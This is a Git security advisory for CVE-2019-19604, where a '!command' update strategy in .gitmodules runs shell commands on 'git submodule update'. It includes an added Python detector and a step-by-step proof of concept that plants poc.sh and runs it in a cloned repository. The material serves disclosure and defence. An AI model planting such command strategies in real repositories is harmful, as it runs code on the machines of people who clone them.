A git submodule update operation can lead to the execution of arbitrary shell commands defined in the .gitmodules file.

Affected products
- Git versions 2.20.0 through 2.24.0

Fixed versions
- Git v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2

Disclosure timeline
- 2019-11-11 Initial report to the git-security mailing list
- 2019-12-10 Release of Git v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2

CVE number
- CVE-2019-19604

Details
The git-submodule man page lists the following configuration option for submodules:

The following update procedures are only available via the submodule.<name>.update configuration variable:

custom command: an arbitrary shell command that takes a single argument (the sha1 of the commit recorded in the superproject) is executed. When submodule.<name>.update is set to !command, the remainder after the exclamation mark is the custom command.
This configuration value can be defined in the .gitmodules file of a Git repository; however, when the --init flag is used the setting is overwritten. The init_submodule method in builtin/submodule--helper.c takes care of this:

    if (git_config_get_string(sb.buf, &upd) &&
        sub->update_strategy.type != SM_UPDATE_UNSPECIFIED) {
        if (sub->update_strategy.type == SM_UPDATE_COMMAND) {
            fprintf(stderr, _("warning: command update mode suggested for submodule '%s'\n"),
                sub->name);
            upd = xstrdup("none");
        } else

The code above sets the update strategy to none in the .git/config of the repository that contains the submodule.

The command is therefore executed only in a special case: git submodule update is called without --init while no submodule.<name>.update strategy has been recorded in .git/config, and a subsequent update call then picks up a strategy from .gitmodules that points at an external command.
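As an added defensive check that is not part of the original advisory, the following Python script parses a repository's .gitmodules and .git/config and reports every submodule whose update strategy is a !command, together with whether .git/config carries an overriding value for it; an absent override is exactly the state in which an unpatched git submodule update would run the command. The minimal config parser, the function names and the sample inputs are this example's own assumptions, modelled on the proof of concept below.

```python
import re
from typing import Dict, List, Optional

# Minimal parser for the git-config syntax shared by .gitmodules and .git/config.
# Assumption: values are unquoted single-line strings; quoting, escapes and
# continuation lines are not handled.
SECTION_RE = re.compile(r'^\[submodule\s+"(?P<name>[^"]+)"\]$')
KEY_RE = re.compile(r'^(?P<key>[A-Za-z][A-Za-z0-9-]*)\s*=\s*(?P<value>.*)$')

def parse_submodule_sections(text: str) -> Dict[str, Dict[str, str]]:
    """Return {submodule name: {key: value}} for every [submodule "..."] section."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#;':
            continue
        m = SECTION_RE.match(line)
        if m:
            current = sections.setdefault(m.group('name'), {})
        elif line.startswith('['):
            current = None  # some other section, e.g. [core]
        elif current is not None and (kv := KEY_RE.match(line)):
            current[kv.group('key').lower()] = kv.group('value').strip()
    return sections

def find_command_update_strategies(gitmodules: str, git_config: str = '') -> List[dict]:
    """One finding per submodule whose .gitmodules update strategy is '!command'.
    'local_override' is submodule.<name>.update as recorded in .git/config (git's
    init step writes "none" there for command strategies); None means the key is
    absent, so an unpatched `git submodule update` would fall back to the command.
    """
    local = parse_submodule_sections(git_config)
    findings = []
    for name, settings in parse_submodule_sections(gitmodules).items():
        update = settings.get('update', '')
        if update.startswith('!'):
            findings.append({'submodule': name,
                             'command': update[1:].strip(),
                             'local_override': local.get(name, {}).get('update')})
    return findings

# Constructed sample inputs modelled on the advisory's proof of concept.
GITMODULES_POC = ('[submodule "xxeserve"]\n\tpath = xxeserve\n'
                  '\turl = https://gitlab.com/joernchen/xxeserve.git\n\tupdate = !../poc.sh\n')
GIT_CONFIG_UNSET = '[core]\n\tbare = false\n[submodule "xxeserve"]\n\turl = https://gitlab.com/joernchen/xxeserve.git\n'
GIT_CONFIG_NONE = GIT_CONFIG_UNSET + '\tupdate = none\n'

if __name__ == '__main__':
    print(find_command_update_strategies(GITMODULES_POC, GIT_CONFIG_UNSET))
```

Run it against the real files with the contents of .gitmodules and .git/config read from disk; any finding whose local_override is None is a submodule that a pre-fix Git would update by running the listed command.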
Exploit

First, we prepare a repository:
    joern@hostname ~/tmp $ mkdir example
    joern@hostname ~/tmp $ cd example
    joern@hostname ~/tmp/example $ git init .
    Initialized empty Git repository in /home/joern/tmp/example/.git/
    joern@hostname ~/tmp/example $ git submodule add https://gitlab.com/joernchen/xxeserve.git
    Cloning into '/home/joern/tmp/example/xxeserve'...
    remote: Enumerating objects: 34, done.
    remote: Counting objects: 100% (34/34), done.
    remote: Compressing objects: 100% (29/29), done.
    remote: Total 34 (delta 14), reused 0 (delta 0)
    Unpacking objects: 100% (34/34), done.
    joern@hostname ~/tmp/example $ git commit -m "first commit"
    [master (root-commit) 9ed9add] first commit
     2 files changed, 4 insertions(+)
     create mode 100644 .gitmodules
     create mode 160000 xxeserve

So far there is nothing special about the repository:
    joern@hostname ~/tmp/example $ cat .gitmodules
    [submodule "xxeserve"]
        path = xxeserve
        url = https://gitlab.com/joernchen/xxeserve.git

Next, we clone the repository:
    joern@hostname ~/tmp $ git clone --recurse-submodules example test
    Cloning into 'test'...
    done.
    Submodule 'xxeserve' (https://gitlab.com/joernchen/xxeserve.git) registered for path 'xxeserve'
    Cloning into '/home/joern/tmp/test/xxeserve'...
    remote: Enumerating objects: 34, done.
    remote: Counting objects: 100% (34/34), done.
    remote: Compressing objects: 100% (29/29), done.
    remote: Total 34 (delta 14), reused 0 (delta 0)
    Submodule path 'xxeserve': checked out 'c4a859fb16e2c65a1708d1c0a404f339191fd8e9'

Back in the original repository, we change the submodule and introduce the command in .gitmodules:
    joern@hostname ~/tmp/example $ echo -e '#!/bin/bash\x0aid>/tmp/poc.txt' > poc.sh
    joern@hostname ~/tmp/example $ echo ' update = !../poc.sh' >> .gitmodules
    joern@hostname ~/tmp/example $ chmod +x poc.sh
    joern@hostname ~/tmp/example $ cd xxeserve
    joern@hostname ~/tmp/example/xxeserve $ git checkout 0f5c204
    Previous HEAD position was c4a859f Merge pull request #4 from mccabe615/master
    HEAD is now at 0f5c204 Update README.md
    joern@hostname ~/tmp/example/xxeserve $ cd ..
    joern@hostname ~/tmp/example $ git add .
    joern@hostname ~/tmp/example $ git commit -m 'second commit'
    [master ec3abce] second commit
     3 files changed, 4 insertions(+), 1 deletion(-)
     create mode 100755 poc.sh

In the cloned repository, the command runs after a git pull followed by git submodule update:
    joern@hostname ~/tmp/test $ git pull
    remote: Enumerating objects: 6, done.
    remote: Counting objects: 100% (6/6), done.
    remote: Compressing objects: 100% (3/3), done.
    remote: Total 4 (delta 1), reused 0 (delta 0)
    Unpacking objects: 100% (4/4), done.
    From /home/joern/tmp/example
     + 113237f...ec3abce master     -> origin/master  (forced update)
    Updating 9ed9add..ec3abce
    Fast-forward
     .gitmodules | 1 +
     poc.sh      | 2 ++
     xxeserve    | 2 +-
     3 files changed, 4 insertions(+), 1 deletion(-)
     create mode 100755 poc.sh
    joern@hostname ~/tmp/test $ git submodule update
    Submodule path 'xxeserve': '../poc.sh 0f5c2043db22ff091b800cb6c61e015492ad0885'
    joern@hostname ~/tmp/test $ cat /tmp/poc.txt
    uid=1000(joern) gid=1000(joern) groups=1000(joern),3(sys),90(network),98(power),991(lp),998(wheel)

External references
- Git release announcement
- https://about.gitlab.com/blog/2019/12/10/critical-security-release-gitlab-12-5-4-released/
- https://gitlab.com/gitlab-com/gl-security/disclosures/blob/master/003_git_submodule/advisory.md
